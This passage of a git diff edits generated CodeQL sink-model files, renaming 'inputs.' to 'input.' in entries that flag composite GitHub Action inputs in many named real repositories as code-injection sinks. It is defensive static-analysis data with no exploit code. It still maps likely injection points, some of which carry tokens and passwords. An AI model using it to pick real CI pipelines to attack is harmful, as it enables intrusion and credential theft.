- ["adap/flower", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml index 80a23352e55b..a9d657247359 100644 --- a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["agoric/agoric-sdk", "*", "inputs.xsnap-random-init", "code-injection", "generated"] - - ["agoric/agoric-sdk", "*", "inputs.path", "code-injection", "generated"] - - ["agoric/agoric-sdk", "*", "inputs.ignore-endo-branch", "code-injection", "generated"] - - ["agoric/agoric-sdk", "*", "inputs.codecov-token", "code-injection", "generated"] - - ["agoric/agoric-sdk", "*", "inputs.datadog-token", "code-injection", "generated"] - - ["agoric/agoric-sdk", "*", "inputs.datadog-site", "code-injection", "generated"] \ No newline at end of file + - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.path", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.ignore-endo-branch", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.codecov-token", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.datadog-token", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "input.datadog-site", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml index 441c8ebcd52a..d40014b9a129 100644 --- a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["airbnb/lottie-ios", "*", "inputs.xcode", "code-injection", "generated"] \ No newline at end of file + - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml index d4e8a2c32bf3..7452ddc21876 100644 --- a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["airbytehq/airbyte", "*", "inputs.options", "code-injection", "generated"] - - ["airbytehq/airbyte", "*", "inputs.subcommand", "code-injection", "generated"] \ No newline at end of file + - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"] + - ["airbytehq/airbyte", "*", "input.subcommand", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml index ce3ed699b9ab..a91d2c7b0e57 100644 --- a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["amazon-ion/ion-java", "*", "inputs.project_version", "code-injection", "generated"] - - ["amazon-ion/ion-java", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file + - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"] + - ["amazon-ion/ion-java", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml index 8b62fe8e0aad..95b5ba13ad17 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["anchore/grype", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file + - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml index 946faca35c93..7157e1bea48a 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["anchore/syft", "*", "inputs.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file + - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml index b68c9462c1bb..a3f43d524b4a 100644 --- a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml +++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["angular/dev-infra", "*", "inputs.firebase-public-dir", "code-injection", "generated"] - - ["angular/dev-infra", "*", "inputs.workflow-artifact-name", "code-injection", "generated"] - - ["angular/dev-infra", "*", "inputs.artifact-build-revision", "code-injection", "generated"] - - ["angular/dev-infra", "*", "inputs.pull-number", "code-injection", "generated"] - - ["angular/dev-infra", "*", "inputs.deploy-directory", "code-injection", "generated"] \ No newline at end of file + - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"] + - ["angular/dev-infra", "*", "input.workflow-artifact-name", "code-injection", "generated"] + - ["angular/dev-infra", "*", "input.artifact-build-revision", "code-injection", "generated"] + - ["angular/dev-infra", "*", "input.pull-number", "code-injection", "generated"] + - ["angular/dev-infra", "*", "input.deploy-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml index aedefc9ee02b..6e0d980943a1 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ansible/ansible-lint", "*", "inputs.args", "code-injection", "generated"] - - ["ansible/ansible-lint", "*", "inputs.working_directory", "code-injection", "generated"] \ No newline at end of file + - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"] + - ["ansible/ansible-lint", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml index 36f7a18e1989..ef682ff4fffe 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ansible/awx", "*", "inputs.log-filename", "code-injection", "generated"] - - ["ansible/awx", "*", "inputs.github-token", "code-injection", "generated"] \ No newline at end of file + - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"] + - ["ansible/awx", "*", "input.github-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml index a1d324f44bdf..7ce84599d17d 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/arrow-datafusion", "*", "inputs.rust-version", "code-injection", "generated"] \ No newline at end of file + - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml index 53142801fecd..47f1c83016f5 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/arrow-rs", "*", "inputs.target", "code-injection", "generated"] - - ["apache/arrow-rs", "*", "inputs.rust-version", "code-injection", "generated"] \ No newline at end of file + - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"] + - ["apache/arrow-rs", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml index 5170beb3a7aa..54353368db2e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/arrow", "*", "inputs.upload", "code-injection", "generated"] \ No newline at end of file + - ["apache/arrow", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml index 1fabdd9085b2..119115c15609 100644 --- a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/bookkeeper", "*", "inputs.mode", "code-injection", "generated"] \ No newline at end of file + - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml index 370d3c6954ee..762623ed27e2 100644 --- a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/brpc", "*", "inputs.options", "code-injection", "generated"] \ No newline at end of file + - ["apache/brpc", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml index ac0156b719fb..2272d7ff8e68 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml @@ -3,15 +3,15 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/camel-k", "*", "inputs.test-suite", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.image-version", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.image-registry-insecure", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.image-name", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.image-registry-host", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.catalog-source-namespace", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.catalog-source-name", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.image-namespace", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.version", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.otlp-collector-image-version", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.otlp-collector-image-name", "code-injection", "generated"] - - ["apache/camel-k", "*", "inputs.global-operator-namespace", "code-injection", "generated"] \ No newline at end of file + - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-version", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-registry-insecure", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-registry-host", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.catalog-source-namespace", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.catalog-source-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-namespace", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.version", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.otlp-collector-image-version", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.otlp-collector-image-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.global-operator-namespace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml index 9ee197ed8848..3537169892a4 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/camel", "*", "inputs.end-commit", "code-injection", "generated"] - - ["apache/camel", "*", "inputs.start-commit", "code-injection", "generated"] - - ["apache/camel", "*", "inputs.distribution", "code-injection", "generated"] - - ["apache/camel", "*", "inputs.version", "code-injection", "generated"] - - ["apache/camel", "*", "inputs.pr-id", "code-injection", "generated"] - - ["apache/camel", "*", "inputs.mode", "code-injection", "generated"] \ No newline at end of file + - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"] + - ["apache/camel", "*", "input.start-commit", "code-injection", "generated"] + - ["apache/camel", "*", "input.distribution", "code-injection", "generated"] + - ["apache/camel", "*", "input.version", "code-injection", "generated"] + - ["apache/camel", "*", "input.pr-id", "code-injection", "generated"] + - ["apache/camel", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml index 99a1e4cec710..dfac696dddf3 100644 --- a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/flink", "*", "inputs.maven-parameters", "code-injection", "generated"] - - ["apache/flink", "*", "inputs.env", "code-injection", "generated"] - - ["apache/flink", "*", "inputs.target_directory", "code-injection", "generated"] - - ["apache/flink", "*", "inputs.source_directory", "code-injection", "generated"] - - ["apache/flink", "*", "inputs.jdk_version", "code-injection", "generated"] \ No newline at end of file + - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"] + - ["apache/flink", "*", "input.env", "code-injection", "generated"] + - ["apache/flink", "*", "input.target_directory", "code-injection", "generated"] + - ["apache/flink", "*", "input.source_directory", "code-injection", "generated"] + - ["apache/flink", "*", "input.jdk_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml index d2a6dbd4929e..5c82922c35e0 100644 --- a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/nuttx", "*", "inputs.haskell", "code-injection", "generated"] - - ["apache/nuttx", "*", "inputs.dotnet", "code-injection", "generated"] - - ["apache/nuttx", "*", "inputs.android", "code-injection", "generated"] \ No newline at end of file + - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"] + - ["apache/nuttx", "*", "input.dotnet", "code-injection", "generated"] + - ["apache/nuttx", "*", "input.android", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml index 13a9ff475b92..d618f7b761fe 100644 --- a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/opendal", "*", "inputs.feature", "code-injection", "generated"] - - ["apache/opendal", "*", "inputs.setup", "code-injection", "generated"] - - ["apache/opendal", "*", "inputs.service", "code-injection", "generated"] - - ["apache/opendal", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file + - ["apache/opendal", "*", "input.feature", "code-injection", "generated"] + - ["apache/opendal", "*", "input.setup", "code-injection", "generated"] + - ["apache/opendal", "*", "input.service", "code-injection", "generated"] + - ["apache/opendal", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml index a173154bec07..c49315d791a9 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/pekko", "*", "inputs.upload", "code-injection", "generated"] \ No newline at end of file + - ["apache/pekko", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml index f7a5017d2fb5..f58fcf336fcd 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/pulsar-helm-chart", "*", "inputs.limit-access-to-users", "code-injection", "generated"] - - ["apache/pulsar-helm-chart", "*", "inputs.limit-access-to-actor", "code-injection", "generated"] - - ["apache/pulsar-helm-chart", "*", "inputs.secure-access", "code-injection", "generated"] - - ["apache/pulsar-helm-chart", "*", "inputs.action", "code-injection", "generated"] - - ["apache/pulsar-helm-chart", "*", "inputs.yamale_version", "code-injection", "generated"] - - ["apache/pulsar-helm-chart", "*", "inputs.yamllint_version", "code-injection", "generated"] - - ["apache/pulsar-helm-chart", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-actor", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.secure-access", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.action", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.yamale_version", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.yamllint_version", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml index 1bcf118810ff..4812eaa5b4a3 100644 --- a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/superset", "*", "inputs.requirements-type", "code-injection", "generated"] \ No newline at end of file + - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml index fb210d5af55c..de8c3e1b7259 100644 --- a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml +++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["appflowy-io/appflowy", "*", "inputs.test_path", "code-injection", "generated"] - - ["appflowy-io/appflowy", "*", "inputs.flutter_profile", "code-injection", "generated"] \ No newline at end of file + - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"] + - ["appflowy-io/appflowy", "*", "input.flutter_profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml index 77554b9872e3..dee268884a14 100644 --- a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aptos-labs/aptos-core", "*", "inputs.GIT_CREDENTIALS", "code-injection", "generated"] - - ["aptos-labs/aptos-core", "*", "inputs.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"] - - ["aptos-labs/aptos-core", "*", "inputs.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file + - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"] + - ["aptos-labs/aptos-core", "*", "input.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"] + - ["aptos-labs/aptos-core", "*", "input.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml index 7fc1eaaca483..5e0e51583902 100644 --- a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["archivesspace/archivesspace", "*", "inputs.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file + - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml index 921095f8a380..bb4b41a05928 100644 --- a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["armadaproject/armada", "*", "inputs.tox-env", "code-injection", "generated"] \ No newline at end of file + - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml index e8dba39c742c..ef3a84762dbf 100644 --- a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["armbian/build", "*", "inputs.armbian_pgp_password", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_extensions", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_release", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_kernel_branch", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_board", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_target", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_branch", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_ui", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_version", "code-injection", "generated"] \ No newline at end of file + - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_extensions", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_release", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_kernel_branch", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_board", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_target", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_branch", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_ui", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml index 69970d3419b2..425242bf220e 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["auth0/auth0-java", "*", "inputs.signing-password", "code-injection", "generated"] - - ["auth0/auth0-java", "*", "inputs.signing-key", "code-injection", "generated"] - - ["auth0/auth0-java", "*", "inputs.ossr-password", "code-injection", "generated"] - - ["auth0/auth0-java", "*", "inputs.ossr-username", "code-injection", "generated"] \ No newline at end of file + - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "input.signing-key", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "input.ossr-password", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "input.ossr-username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml index b57797cc643c..62f1ed005edc 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["auth0/auth0.net", "*", "inputs.nuget-token", "code-injection", "generated"] - - ["auth0/auth0.net", "*", "inputs.nuget-directory", "code-injection", "generated"] - - ["auth0/auth0.net", "*", "inputs.project-paths", "code-injection", "generated"] \ No newline at end of file + - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"] + - ["auth0/auth0.net", "*", "input.nuget-directory", "code-injection", "generated"] + - ["auth0/auth0.net", "*", "input.project-paths", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml index 08b65cea6d72..098b460bbd87 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["auth0/auth0.swift", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml index 453e60f3595e..d5a257be220a 100644 --- a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["autogluon/autogluon", "*", "inputs.submodule-to-test", "code-injection", "generated"] - - ["autogluon/autogluon", "*", "inputs.command", "code-injection", "generated"] - - ["autogluon/autogluon", "*", "inputs.work-dir", "code-injection", "generated"] - - ["autogluon/autogluon", "*", "inputs.job-name", "code-injection", "generated"] - - ["autogluon/autogluon", "*", "inputs.job-type", "code-injection", "generated"] \ No newline at end of file + - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "input.command", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "input.work-dir", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "input.job-name", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "input.job-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml index 012802b80063..53c6258551f4 100644 --- a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml +++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["avaiga/taipy", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file + - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml index a397a77f6dc1..62a4f2bbcd7b 100644 --- a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aws-amplify/amplify-cli", "*", "inputs.cli-version", "code-injection", "generated"] \ No newline at end of file + - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml index 